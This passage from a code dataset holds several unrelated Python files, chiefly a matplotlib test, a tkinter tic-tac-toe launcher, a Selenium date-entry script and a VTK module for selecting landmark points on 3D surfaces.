unit\r\nax.set_yticks(range(0, 11, 1))\r\n\r\nax.text(0,c,c)\r\nplt.title('Summary Score')\r\n\r\nplt.ylim(top=10)\r\n\r\nplt.savefig(\"sum.png\")\r\n","repo_name":"yashrajsingh30/Hostel","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"115310188","text":"import warnings\n\nimport pytest\n\nimport matplotlib\nfrom matplotlib.testing.decorators import image_comparison\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import EngFormatter\n\n\nwith warnings.catch_warnings():\n warnings.simplefilter('ignore')\n needs_usetex = pytest.mark.skipif(\n not matplotlib.checkdep_usetex(True),\n reason='Missing TeX of Ghostscript or dvipng')\n\n\n@needs_usetex\n@image_comparison(baseline_images=['test_usetex'],\n extensions=['pdf', 'png'],\n tol=0.3)\ndef test_usetex():\n matplotlib.rcParams['text.usetex'] = True\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.text(0.1, 0.2,\n # the \\LaTeX macro exercises character sizing and placement,\n # \\left[ ... \\right\\} draw some variable-height characters,\n # \\sqrt and \\frac draw horizontal rules, \\mathrm changes the font\n r'\\LaTeX\\ $\\left[\\int\\limits_e^{2e}'\n r'\\sqrt\\frac{\\log^3 x}{x}\\,\\mathrm{d}x \\right\\}$',\n fontsize=24)\n ax.set_xticks([])\n ax.set_yticks([])\n","repo_name":"mobiledgex/edge-cloud-qa","sub_path":"tools/cpu_generator/lib/python3.7/site-packages/matplotlib/tests/test_usetex.py","file_name":"test_usetex.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41735856361","text":"'''\n [문제]\n [조건1] 리스트에 랜덤 숫자(1~100) 다섯 개를 추가한다.\n [조건2] 위 값 중에 5의 배수들만 출력하시오.\n [예시]\n arr = [70, 87, 61, 4, 81]\n 70\n'''\nimport random\n\narr = []\n\ni = 1\n\nfor i in range(5):\n num = random.randint(1,100)\n arr.append(num)\n\nprint(arr)\n\ny = 0\ncount = 0\n\nfor y in range(len(arr)):\n if arr[y]%5==0:\n print(arr[y])\n else:\n count += 1\n\n if count == len(arr):\n print(\"해당 배열 안에서 5의 배수를 찾을 수 없습니다.\")\n","repo_name":"wisline97/keduit_frontend","sub_path":"02_python/수업자료/수업시간 내 진행/H일차배열/일차배열2_문제_랜덤/일차배열2_문제04_비교_배수_문제.py","file_name":"일차배열2_문제04_비교_배수_문제.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34711405652","text":"from logging import root\r\nfrom tkinter import DISABLED, Button,Canvas,Tk\r\nfrom turtle import bgcolor\r\nfrom PIL import Image,ImageTk\r\nfrom os import system\r\nfrom threading import Thread\r\nimport tkinter.font as font\r\nfrom playsound import playsound\r\n\r\nroot=Tk()\r\nroot.title(\"Tic Tac Toe\")\r\nroot.geometry(\"1920x1080\")\r\ncanvas1 = Canvas( root, width = 1920,height = 1080)\r\ncanvas1.pack(fill = \"both\", expand = True)\r\nimg=Image.open(\"bg.jpg\")\r\nresized_image= img.resize((1920,1080), Image.ANTIALIAS)\r\nbg=ImageTk.PhotoImage(resized_image)\r\ncanvas1.create_image( 0, 0, image = bg,anchor = \"nw\")\r\ndef run_app():\r\n canvas1.itemconfig(2,state=\"hidden\")\r\n system(\"python single.py\")\r\ndef run_app1():\r\n canvas1.itemconfig(2,state=\"hidden\")\r\n system(\"python client.py\")\r\n #one machine should have server.py in system() functin in this function to run multi player.\r\nbuttonFont = font.Font(family='Helvetica', size=12, weight='bold')\r\nsplayer = Button(root, text = \"SINGLE 
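The Korean exercise record above asks, in translation: append five random numbers between 1 and 100 to a list, then print only the multiples of 5, falling back to a message ("no multiple of 5 found in this array") when there are none. A more direct sketch of the same task:

import random

arr = [random.randint(1, 100) for _ in range(5)]
print(arr)

multiples = [n for n in arr if n % 5 == 0]
if multiples:
    print(*multiples, sep='\n')
else:
    print('No multiples of 5 in this list.')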
PLAYER\",width=30,height=3,command=Thread(target=run_app).start,font=buttonFont).place(x = 630, y = 270)\r\nmplayer = Button(root, text = \"MULTI PLAYER\",width=30,height=3,command=Thread(target=run_app1).start,font=buttonFont).place(x = 630, y = 360)\r\nroot.mainloop()","repo_name":"Tejas7102/tic-tac-toe","sub_path":"mini_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10825058221","text":"from selenium import webdriver\nimport time\ndriver=webdriver.Firefox()\ndriver.maximize_window()\ndriver.implicitly_wait(6)\ndriver.get(\"http://trains.ctrip.com/TrainBooking/SearchTrain.aspx\")\ndriver.execute_script(\"document.getElementById('departDate').removeAttribute('readonly')\")\ndriver.find_element_by_id(\"departDate\").clear()\ndriver.find_element_by_id(\"departDate\").send_keys(\"2019-08-12\")\ntime.sleep(10)\n","repo_name":"mz237943553mz/suyaun_666","sub_path":"PycharmProjects/mz/my_list/JS日历.py","file_name":"JS日历.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37310478187","text":"import sys\nfrom enum import IntFlag\nfrom enum import auto as enum_auto\nimport numpy as np\nfrom vtkmodules.vtkCommonColor import vtkNamedColors, vtkColorSeries\nfrom vtkmodules.vtkCommonDataModel import vtkPointSet, vtkPolyData, vtkImageData, vtkExplicitStructuredGrid, vtkStructuredGrid, vtkVector3d, vtkPlanes\nfrom vtkmodules.vtkRenderingCore import (\n vtkActor,\n vtkMapper,\n vtkActorCollection,\n vtkTextActor, \n vtkProperty,\n vtkCellPicker,\n vtkPointPicker,\n vtkPolyDataMapper,\n vtkDataSetMapper,\n vtkRenderWindow,\n vtkRenderWindowInteractor,\n vtkRenderer,\n vtkColorTransferFunction,\n vtkInteractorStyle,\n vtkGlyph3DMapper,\n vtkProp,\n vtkBillboardTextActor3D,\n vtkCoordinate\n)\nfrom vtkmodules.vtkFiltersGeneral import vtkCurvatures\nfrom vtkmodules.vtkFiltersCore import vtkGlyph3D, vtkExtractEdges, vtkAppendPolyData\nfrom vtkmodules.vtkInteractionStyle import vtkInteractorStyleTrackballCamera\nfrom vtkmodules.vtkCommonCore import vtkLookupTable, vtkIdTypeArray, vtkPoints, vtkFloatArray\nfrom vtkmodules.vtkFiltersSources import vtkSphereSource\n\nfrom .polydata import *\n\n#_______________________#\n# crash without following lines\n# noinspection PyUnresolvedReferences\nimport vtkmodules.vtkInteractionStyle\n# noinspection PyUnresolvedReferences\nimport vtkmodules.vtkRenderingOpenGL2\n#_______________________#\n\n\n# from .polydata import *\n\n\nclass MOUSE(IntFlag):\n LEFT = enum_auto()\n RIGHT = enum_auto()\n MOVED = enum_auto()\n CTRL = enum_auto()\n ALT = enum_auto()\n \n # def left_down(self):\n # return (self & self.LEFT) != 0\n\n # def left_moved(self):\n # return (self & (self.LEFT | self.MOVED)) != 0\n\n # def right_down(self):\n # return (self & self.RIGHT) != 0\n\n # def right_moved(self):\n # return (self & (self.RIGHT | self.MOVED)) != 0\n\n # def ctrl_left(self):\n # return (self & (self.LEFT | self.CTRL)) != 0\n\n # def alt_left(self):\n # return (self & (self.LEFT | self.ALT)) != 0\n\n # def ctrl_right(self):\n # return (self & (self.RIGHT | self.CTRL)) != 0\n\n # def alt_right(self):\n # return (self & (self.RIGHT | self.ALT)) != 0\n\n\nclass MODE(IntFlag):\n SELECT = enum_auto()\n _EDIT = enum_auto()\n _ADD = enum_auto()\n EDIT = SELECT | _EDIT\n ADD = SELECT | _ADD\n FREE = EDIT | ADD\n\n def allows_select(self):\n return (self & 
self.SELECT) != 0\n\n def allows_add(self):\n return (self & self._ADD) != 0\n\n def allows_edit(self):\n return (self & self._EDIT) != 0\n\n def allows_delete(self):\n return (self & self._ADD) != 0\n\n\nclass Window():\n\n DEFAULT_STYLE_CLASS = vtkInteractorStyleTrackballCamera\n\n\n def __init__(self):\n\n self.renderer = vtkRenderer()\n self.renderer.SetBackground(.67, .93, .93)\n\n self.render_window = vtkRenderWindow()\n self.render_window.AddRenderer(self.renderer)\n self.render_window.SetSize(960, 960)\n self.render_window.SetWindowName('')\n\n self.interactor = vtkRenderWindowInteractor()\n self.interactor.SetRenderWindow(self.render_window)\n\n self.lut = self.get_diverging_lut()\n\n return None\n\n\n def initialize(self, style=None):\n if style is None:\n style = self.DEFAULT_STYLE_CLASS()\n\n self.style = style\n # Interactor callbacks\n self.style.AddObserver('LeftButtonPressEvent', self.mouse_event)\n self.style.AddObserver('LeftButtonReleaseEvent', self.mouse_event)\n self.style.AddObserver('RightButtonPressEvent', self.mouse_event)\n self.style.AddObserver('RightButtonReleaseEvent', self.mouse_event)\n self.style.AddObserver('MouseMoveEvent', self.mouse_event)\n self.style.AddObserver('KeyPressEvent', self.key_event)\n self.style.AddObserver('KeyReleaseEvent', self.key_event)\n\n self.mouse_status = 0\n self.style.SetDefaultRenderer(self.renderer)\n self.interactor.SetInteractorStyle(self.style)\n\n return None\n\n\n\n#____________________________________________________________________#\n# start, quit, refresh, save\n\n\n def start(self):\n self.interactor.Initialize()\n self.render_window.Render()\n self.interactor.Start()\n return None\n\n\n def quit(self):\n self.render_window.Finalize()\n self.interactor.TerminateApp()\n del self.render_window, self.interactor\n\n\n def refresh(self, text=None):\n self.render_window.Render()\n\n\n def save(self):\n pass\n\n\n def save_ui(self, **kwargs):\n\n from tkinter import Tk, filedialog\n Tk().withdraw()\n \n try:\n with filedialog.asksaveasfile(**kwargs) as f:\n self.save_file(f)\n except:\n print(\"file didn't save\") \n\n\n def save_file(self, f):\n pass\n\n\n#____________________________________________________________________#\n# interaction\n\n\n def key_event(self, obj, event):\n key = obj.GetInteractor().GetKeySym()\n if event=='KeyPressEvent':\n # disable auto-repeat by monitoring held keys\n if not hasattr(self, '_keys'):\n self._keys = []\n if key in self._keys:\n return None\n else:\n print(key)\n self._keys.append(key)\n\n print('event:' + key + ' pressed')\n \n return self.key_press_event(key)\n elif event=='KeyReleaseEvent':\n if not hasattr(self, '_keys'):\n self._keys = []\n if key in self._keys:\n self._keys.remove(key)\n\n print('event:' + key + ' released')\n\n return self.key_release_event(key)\n\n\n def key_press_event(self, key):\n if key == 's' and self.interactor.GetControlKey():\n self.save()\n\n return None\n\n\n def key_release_event(self, key):\n pass\n\n\n def mouse_event(self, obj:vtkInteractorStyle, event):\n # this is to be overridden by subclass\n # should be unique for each class\n\n # check if function keys are pressed\n # the default behavior is:\n # CONTINUE THE EVENT CYCLE AS PRESSED, EVEN IF FUNCTION KEY IS RELEASE LATER\n # if this is not desirable\n # monitor the `GetControlKey` instead\n\n print(f'event:{event}')\n \n if 'PressEvent' in event: \n\n # both buttons cannot be pressed\n # one button press releases others\n if self.mouse_status & MOUSE.RIGHT:\n 
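MOUSE and MODE above are IntFlag enums, so a mode is simultaneously a named capability set and a bit mask that allows_select()/allows_edit() can test with &. A small demonstration of the same composition pattern:

from enum import IntFlag, auto

class Mode(IntFlag):
    SELECT = auto()
    EDIT = auto()
    ADD = auto()
    FREE = SELECT | EDIT | ADD

m = Mode.SELECT | Mode.ADD
print(bool(m & Mode.ADD))           # True: capability present
print(bool(m & Mode.EDIT))          # False: capability absent
print(bool(Mode.FREE & Mode.EDIT))  # composite contains EDIT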
self.right_button_release_event()\n elif self.mouse_status & MOUSE.LEFT:\n self.left_button_release_event()\n # start of a fresh event cycle - reset mouse status\n self.mouse_status = 0\n\n # check ctrl key\n if obj.GetInteractor().GetControlKey():\n self.mouse_status |= MOUSE.CTRL\n # check alt key\n if obj.GetInteractor().GetAltKey():\n self.mouse_status |= MOUSE.ALT\n # if left button is pressed\n if event == 'LeftButtonPressEvent':\n self.mouse_status |= MOUSE.LEFT\n self.left_button_press_event()\n # if right button is pressed\n elif event == 'RightButtonPressEvent':\n self.mouse_status |= MOUSE.RIGHT\n self.right_button_press_event()\n\n elif 'ReleaseEvent' in event: # \n # if left button is released\n if event == 'LeftButtonReleaseEvent':\n self.left_button_release_event()\n # if right button is released\n if event == 'RightButtonReleaseEvent':\n self.right_button_release_event()\n # end of an event cycle - reset mouse status\n self.mouse_status = 0\n\n elif event == 'MouseMoveEvent':\n self.mouse_move_event()\n self.mouse_status = self.mouse_status | MOUSE.MOVED\n\n\n # Interactor callbacks\n\n def left_button_press_event(self):\n return self.style.OnLeftButtonDown()\n\n def left_button_release_event(self):\n return self.style.OnLeftButtonUp()\n\n def right_button_press_event(self):\n return self.style.OnRightButtonDown()\n\n def right_button_release_event(self):\n return self.style.OnRightButtonUp()\n\n def mouse_move_event(self):\n return self.style.OnMouseMove()\n\n\n#____________________________________________________________________#\n# methods\n\n @staticmethod\n def get_diverging_lut():\n \"\"\"\n See: [Diverging Color Maps for Scientific Visualization](https://www.kennethmoreland.com/color-maps/)\n start point midPoint end point\n cool to warm: 0.230, 0.299, 0.754 0.865, 0.865, 0.865 0.706, 0.016, 0.150\n purple to orange: 0.436, 0.308, 0.631 0.865, 0.865, 0.865 0.759, 0.334, 0.046\n green to purple: 0.085, 0.532, 0.201 0.865, 0.865, 0.865 0.436, 0.308, 0.631\n blue to brown: 0.217, 0.525, 0.910 0.865, 0.865, 0.865 0.677, 0.492, 0.093\n green to red: 0.085, 0.532, 0.201 0.865, 0.865, 0.865 0.758, 0.214, 0.233\n\n :return:\n \"\"\"\n ctf = vtkColorTransferFunction()\n ctf.SetColorSpaceToDiverging()\n # Cool to warm.\n ctf.AddRGBPoint(0.0, 0.230, 0.299, 0.754)\n ctf.AddRGBPoint(0.5, 0.865, 0.865, 0.865)\n ctf.AddRGBPoint(1.0, 0.706, 0.016, 0.150)\n\n table_size = 256\n lut = vtkLookupTable()\n lut.SetNumberOfTableValues(table_size)\n lut.Build()\n\n for i in range(0, table_size):\n rgba = list(ctf.GetColor(float(i) / table_size))\n rgba.append(1)\n lut.SetTableValue(i, rgba)\n\n return lut\n\n\n @staticmethod\n def get_ct_lut():\n # Define a suitable grayscale lut\n bw_lut = vtkLookupTable()\n bw_lut.SetTableRange(0, 4096)\n bw_lut.SetSaturationRange(0, 0)\n bw_lut.SetHueRange(0, 0)\n bw_lut.SetValueRange(0.2, 1)\n bw_lut.Build()\n return bw_lut\n\n\n @staticmethod\n def get_random_color():\n colors = vtkNamedColors()\n colornames = colors.GetColorNames().split('\\n')\n return colors.GetColor3d(colornames[np.random.randint(0,len(colornames))])\n\n\n def add_points(self, points:vtkPointSet, sphere_radius=1.0, color_index:np.ndarray=None, lut=None):\n\n color_array = vtkIdTypeArray()\n color_array.SetName('Color')\n if color_index is None:\n color_index = np.zeros((points.GetNumberOfPoints(),))\n \n color_index = np.asarray(color_index, dtype=np.int64)\n for i in color_index:\n color_array.InsertNextTuple((i,))\n\n points.GetPointData().AddArray(color_array)\n 
points.GetPointData().SetActiveScalars('Color')\n\n src = vtkSphereSource()\n src.SetRadius(sphere_radius)\n src.Update()\n\n glyph_mapper = vtkGlyph3DMapper()\n glyph_mapper.SetSourceConnection(0, src.GetOutputPort())\n glyph_mapper.SetInputData(points)\n glyph_mapper.SetScalarRange(color_index.min(), color_index.max())\n glyph_mapper.SetArrayName('Color')\n glyph_mapper.SetLookupTable(lut if lut else self.get_diverging_lut())\n glyph_mapper.Update()\n\n actor = vtkActor()\n actor.SetMapper(glyph_mapper)\n self.renderer.AddActor(actor)\n\n return actor\n\n\n\n def add_polydata(self, polyd:vtkPolyData):\n mapper = vtkPolyDataMapper()\n mapper.SetInputData(polyd)\n actor = vtkActor()\n actor.SetMapper(mapper)\n color = self.get_random_color()\n actor.GetProperty().SetColor(color)\n self.renderer.AddActor(actor)\n actor.GetProperty().EdgeVisibilityOn()\n return actor\n\n\n def add_explicit_structure_grid(self, esg:vtkExplicitStructuredGrid):\n mapper = vtkDataSetMapper()\n mapper.SetInputData(esg)\n actor = vtkActor()\n actor.GetProperty().EdgeVisibilityOn()\n color = self.get_random_color()\n actor.GetProperty().SetColor(color)\n # actor.GetProperty().SetOpacity(.5)\n actor.SetMapper(mapper)\n self.renderer.AddActor(actor)\n\n\n\n def text3d_actor(self, coords:np.ndarray, text:str):\n \n actor = vtkBillboardTextActor3D()\n actor.SetPosition(coords)\n actor.SetInput(text)\n actor.SetDisplayOffset(0,10)\n actor.GetTextProperty().SetFontSize(24)\n actor.GetTextProperty().SetColor((0,0,0))\n actor.GetTextProperty().SetJustificationToCentered()\n actor.PickableOff()\n # actor.ForceOpaqueOn()\n self.renderer.AddActor(actor)\n return actor\n\n\nclass Selector(Window):\n\n\n DEFAULT_PICKER_CLASS = vtkCellPicker\n DEFAULT_PICKER_TOLERANCE = 1e-6\n\n\n def initialize(self, picker=None):\n if picker is None:\n picker = self.DEFAULT_PICKER_CLASS()\n self.picker = picker\n self.picker.SetTolerance(self.DEFAULT_PICKER_TOLERANCE)\n self.picker.InitializePickList()\n self.picker.SetPickFromList(True)\n\n return super().initialize()\n\n \n def add_pick_polydata(self, polyd):\n \n cc = vtkCurvatures()\n cc.SetInputData(polyd)\n cc.SetCurvatureTypeToMean()\n\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(cc.GetOutputPort())\n mapper.SetScalarModeToUsePointData()\n mapper.SetLookupTable(self.lut)\n mapper.SetScalarRange(-.5,.5)\n mapper.SetArrayName('Mean_Curvature')\n actor = vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().EdgeVisibilityOn()\n self.renderer.AddActor(actor)\n self.picker.AddPickList(actor)\n \n return actor\n\n def add_show_polydata(self, polyd):\n\n cc = vtkCurvatures()\n cc.SetInputData(polyd)\n cc.SetCurvatureTypeToMean()\n\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(cc.GetOutputPort())\n mapper.SetScalarModeToUsePointData()\n mapper.SetLookupTable(self.lut)\n mapper.SetScalarRange(-.5,.5)\n mapper.SetArrayName('Mean_Curvature')\n actor = vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetOpacity(.5)\n self.renderer.AddActor(actor)\n \n return actor\n\n\n def get_pick_props(self):\n l = self.picker.GetPickList()\n props = [vtkProp.SafeDownCast(l.GetItemAsObject(i)) for i in range(l.GetNumberOfItems())]\n return props\n\n\n def get_pick_mappers(self):\n props = self.get_pick_props()\n mapps = []\n for p in props:\n act = vtkActor.SafeDownCast(p)\n if act:\n mapps.append(act.GetMapper())\n else:\n mapps.append(None)\n\n\n def get_pick_properties(self):\n props = self.get_pick_props()\n pptys = []\n for p in props:\n act = 
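Selector above restricts picking to an explicit list of props (SetPickFromList), so clicks can only hit the surfaces registered through add_pick_polydata. The pick itself happens inside an interaction callback; a sketch of the flow, assuming an existing renderer and actor:

from vtkmodules.vtkRenderingCore import vtkCellPicker

picker = vtkCellPicker()
picker.SetTolerance(1e-6)
picker.InitializePickList()
picker.SetPickFromList(True)
# picker.AddPickList(actor)          # only listed props are pickable

# inside a mouse callback:
# picker.Pick(x, y, 0, renderer)
# if picker.GetCellId() >= 0:        # -1 means nothing was hit
#     hit = picker.GetPickPosition() # world coordinates of the pick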
vtkActor.SafeDownCast(p)\n if act:\n pptys.append(act.GetProperty())\n else:\n pptys.append(None)\n\n\n def get_pick_polydata(self):\n return [m.GetInput() for m in self.get_pick_mappers()]\n\n\nclass PolygonalSurfacePointSelector(Selector):\n '''a simple instruction on user interactions:\n\n simple mouse click to select or deselect a point\n\n hold ctrl key and click to:\n if a point is selected, move\n if no point is selected, add a new one\n\n press \"Delete\" key to delete the current selection\n\n programmer's note:\n follow the example below\n ```\n sel = PolygonalSurfacePointSelector()\n sel.add_pick_polydata(some_vtkPolyData_instance) # add surface to pick from\n sel.initialize(\n mode=MODE.SELECT|MODE.ADD, \n named_points={'Sella'=[1,2,3],'Porion'=[4,5,6]}) # set the mode and add initial points\n self.start()\n ```\n each action (select, move, add, delete) can be enabled or disable by setting mode\n\n '''\n DEFAULT_GLYPH_COLOR = (0.8, 0.0, 0.0)\n SELECTED_GLYPH_COLOR = (0.5, 1.0, 0.5)\n\n\n def initialize(self, mode=MODE.EDIT, sphere_radius=.5, named_points={}):\n\n self.mode = mode\n self.selection_names = list(named_points.keys())\n self.selection_points = vtkPoints()\n self.current_id = None\n\n for c in named_points.values():\n self.selection_points.InsertNextPoint(*c)\n\n self.selection_points.Modified()\n \n inp = vtkPointSet()\n inp.SetPoints(self.selection_points)\n src = vtkSphereSource()\n src.SetRadius(sphere_radius)\n src.Update()\n\n # set up glyph3d\n glyph_filter = vtkGlyph3D()\n glyph_filter.SetSourceConnection(src.GetOutputPort())\n glyph_filter.SetInputData(inp)\n glyph_filter.GeneratePointIdsOn()\n glyph_filter.Update()\n\n # attach color\n self.lookup_table = vtkColorTransferFunction()\n self.lookup_table.Build()\n # self.lookup_table.IndexedLookupOn()\n for x in range(len(named_points)):\n self.lookup_table.AddRGBPoint(x,*self.DEFAULT_GLYPH_COLOR)\n\n # display these points\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(glyph_filter.GetOutputPort())\n mapper.SetLookupTable(self.lookup_table)\n mapper.SetScalarModeToUsePointFieldData()\n mapper.SelectColorArray('InputPointIds')\n\n prop = vtkActor()\n prop.SetMapper(mapper)\n\n # set up picker for these points\n # not the same as self.picker\n # self.picker picks from the surface\n # self.glyph_picker picks from point glyphs\n self.glyph_picker = vtkCellPicker()\n self.glyph_picker.SetTolerance(self.DEFAULT_PICKER_TOLERANCE)\n self.glyph_picker.InitializePickList()\n self.glyph_picker.SetPickFromList(True)\n self.glyph_picker.AddPickList(prop)\n self.renderer.AddActor(prop)\n\n # current selection legend\n self.legend = vtkTextActor()\n self.legend.SetPosition(0,0)\n self.legend.SetInput('No Selection')\n self.legend.GetTextProperty().BoldOn()\n self.legend.GetTextProperty().SetFontSize(36)\n self.legend.GetTextProperty().SetColor(.4,0,0)\n # self.legend.GetTextProperty().SetJustificationToCentered()\n self.legend.PickableOff()\n self.renderer.AddActor(self.legend)\n\n return super().initialize()\n \n\n\n def _next_available_name(self):\n i = 1\n while str(i) in self.selection_names:\n i = i+1\n return str(i)\n\n\n def left_button_press_event(self):\n\n pos = self.style.GetInteractor().GetEventPosition()\n self.glyph_picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n \n # following actions are mutually exclusive\n # but for simplicity, they are not written in if-elif-else\n\n # if ctrl is not pressed, and a landmark is hit, possibly select the landmark\n if not 
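Landmark selection in the class above hinges on vtkGlyph3D's GeneratePointIdsOn(): the glyph filter tags every output point with an 'InputPointIds' array, so a pick on a sphere can be mapped back to the index of the landmark that spawned it (as _select does). The tagging itself runs headlessly; a self-contained check:

from vtkmodules.vtkCommonCore import vtkPoints, vtkIdTypeArray
from vtkmodules.vtkCommonDataModel import vtkPolyData
from vtkmodules.vtkFiltersCore import vtkGlyph3D
from vtkmodules.vtkFiltersSources import vtkSphereSource

pts = vtkPoints()
pts.InsertNextPoint(0, 0, 0)
pts.InsertNextPoint(5, 0, 0)
inp = vtkPolyData()
inp.SetPoints(pts)

glyph = vtkGlyph3D()
src = vtkSphereSource()
glyph.SetSourceConnection(src.GetOutputPort())
glyph.SetInputData(inp)
glyph.GeneratePointIdsOn()   # adds 'InputPointIds' to the output
glyph.Update()

ids = vtkIdTypeArray.SafeDownCast(
    glyph.GetOutput().GetPointData().GetArray('InputPointIds'))
# first output point came from landmark 0, last from landmark 1
print(int(ids.GetTuple(0)[0]), int(ids.GetTuple(ids.GetNumberOfTuples() - 1)[0]))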
self.interactor.GetControlKey() and self.mode.allows_select():\n\n if self.glyph_picker.GetCellId() >= 0:\n self._select()\n else:\n self._deselect()\n\n\n elif self.interactor.GetControlKey():\n # if a landmark is already selected and modification is enabled\n if self.current_id is not None and self.mode.allows_edit():\n\n # then update its location and end interaction\n self._move()\n return None\n\n # if a landmark is not selected and addition is enabled\n if self.current_id is None and self.mode.allows_add():\n\n # then add a new point and end interaction\n self._add()\n return None\n\n # continue with a normal press\n return super().left_button_press_event()\n\n\n def _select(self, id=None):\n if not self.mode.allows_select():\n return None\n \n if id is None:\n # find out which landmark it is\n ids = self.glyph_picker.GetDataSet().GetPointData().GetArray('InputPointIds')\n id = vtkIdTypeArray.SafeDownCast(ids).GetTuple(self.glyph_picker.GetPointId())[0]\n id = int(id)\n\n if self.current_id != id:\n if self.current_id is not None:\n self.lookup_table.AddRGBPoint(self.current_id, *self.DEFAULT_GLYPH_COLOR)\n\n self.lookup_table.AddRGBPoint(id, *self.SELECTED_GLYPH_COLOR)\n self.current_id = id\n\n self.legend.SetInput(self.selection_names[self.current_id])\n self.render_window.Render()\n\n return None\n\n\n def _deselect(self):\n\n if self.current_id is not None:\n self.lookup_table.AddRGBPoint(self.current_id, *self.DEFAULT_GLYPH_COLOR)\n\n self.current_id = None\n self.legend.SetInput('No Selection')\n self.render_window.Render()\n\n return None\n\n\n def _move(self):\n if self.current_id is None or not self.mode.allows_edit():\n return None\n \n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n\n if self.picker.GetCellId() >= 0:\n self.selection_points.SetPoint(self.current_id, self.picker.GetPickPosition())\n self.selection_points.Modified()\n\n self.render_window.Render()\n\n return None\n\n\n def _add(self):\n if not self.mode.allows_add():\n return None\n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n\n if self.picker.GetCellId() >= 0 :\n self.selection_names.append(self._next_available_name())\n self.selection_points.InsertNextPoint(self.picker.GetPickPosition())\n self.selection_points.Modified()\n self.lookup_table.AddRGBPoint(self.selection_points.GetNumberOfPoints()-1,*self.DEFAULT_GLYPH_COLOR)\n self.legend.SetInput(f'point {self.selection_names[-1]} added')\n self.render_window.Render()\n\n return None\n\n\n def _delete(self):\n if not self.mode.allows_delete() or self.current_id is None:\n return None\n \n name = self.selection_names[self.current_id]\n self.selection_points.GetData().RemoveTuple(self.current_id)\n self.selection_points.Modified()\n del self.selection_names[self.current_id]\n self.lookup_table.AddRGBPoint(self.current_id, *self.DEFAULT_GLYPH_COLOR)\n self.lookup_table.RemovePoint(self.selection_points.GetNumberOfPoints()-1)\n self.current_id = None\n self.legend.SetInput(f'{name} deleted')\n self.render_window.Render()\n return None\n \n\n def key_press_event(self, key):\n\n if key == \"Escape\":\n return self._deselect()\n\n elif key == \"Up\" or key == \"Left\" :\n if self.current_id is None and self.selection_points.GetNumberOfPoints():\n self._select(id=0)\n elif self.current_id < self.selection_points.GetNumberOfPoints()-1:\n self._select(id=self.current_id+1)\n return None\n\n elif key == \"Down\" 
or key == \"Right\":\n if self.current_id is None and self.selection_points.GetNumberOfPoints():\n self._select(id=self.selection_points.GetNumberOfPoints()-1)\n elif self.current_id > 0:\n self._select(id=self.current_id-1)\n return None\n\n elif key.startswith('Control'):\n if self.current_id is None and self.mode.allows_add():\n self.legend.SetInput(f'Adding Point {self._next_available_name()}')\n elif self.current_id is not None and self.mode.allows_edit():\n self.legend.SetInput(f'Moving {self.selection_names[self.current_id]}')\n self.render_window.Render()\n return None\n\n elif key == 'Delete':\n return self._delete()\n \n return super().key_press_event(key)\n\n \n def key_release_event(self, key):\n\n if key.startswith('Control'):\n if self.current_id is None:\n self.legend.SetInput('No Selection')\n elif self.current_id is not None:\n self.legend.SetInput(self.selection_names[self.current_id])\n self.render_window.Render()\n return None\n \n return super().key_release_event(key)\n\n\nclass PolygonalSurfaceNodeSelector(Selector):\n\n def initialize(self, pick_surf:vtkPolyData, other_surf:vtkPolyData=None, sphere_radius=.5):\n\n self.add_pick_polydata(pick_surf)\n if other_surf is not None:\n self.add_show_polydata(other_surf)\n\n index_id = vtkIdTypeArray()\n self.selection = index_id\n index_id.SetName('Index')\n index_id.SetNumberOfTuples(pick_surf.GetNumberOfPoints())\n index_id.SetNumberOfComponents(1)\n index_id.Fill(0)\n pick_surf.GetPointData().AddArray(index_id)\n pick_surf.GetPointData().SetActiveScalars('Index')\n\n src = vtkSphereSource()\n src.SetRadius(sphere_radius)\n src.Update()\n\n glyph_mapper = vtkGlyph3DMapper()\n glyph_mapper.SetSourceIndexArray('Index')\n glyph_mapper.SourceIndexingOn()\n glyph_mapper.SetLookupTable(self.lut)\n glyph_mapper.SetScalarRange(-.5,.5)\n self.current_id = None\n\n glyph_mapper.SetSourceData(0, vtkPolyData())\n glyph_mapper.SetSourceConnection(1, src.GetOutputPort())\n glyph_mapper.SetSourceConnection(2, src.GetOutputPort())\n glyph_mapper.SetInputData(pick_surf)\n glyph_mapper.Update()\n\n glyph_lut = vtkLookupTable()\n glyph_lut.SetNumberOfColors(3)\n glyph_lut.Build()\n glyph_lut.SetTableValue(0,[.0,.0,.0,0.0])\n glyph_lut.SetTableValue(1,[.2,.8,.2,1.0])\n glyph_lut.SetTableValue(2,[1,1,.2,1.0])\n glyph_lut.Modified()\n glyph_mapper.SetLookupTable(glyph_lut)\n glyph_mapper.SetScalarRange(0,2)\n glyph_mapper.SetArrayName('Index')\n glyph_actor = vtkActor()\n glyph_actor.SetMapper(glyph_mapper)\n \n self.renderer.AddActor(glyph_actor)\n\n super().initialize()\n\n return None\n\n\n def _hover(self):\n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n id = self.picker.GetPointId()\n\n if id >= 0:\n\n if self.current_id is not None:\n if self.current_id == id:\n return None\n if self.selection.GetTuple(self.current_id)[0] == 2:\n self.selection.SetTuple(self.current_id, np.array([0], dtype=np.int64))\n self.current_id = None\n\n if 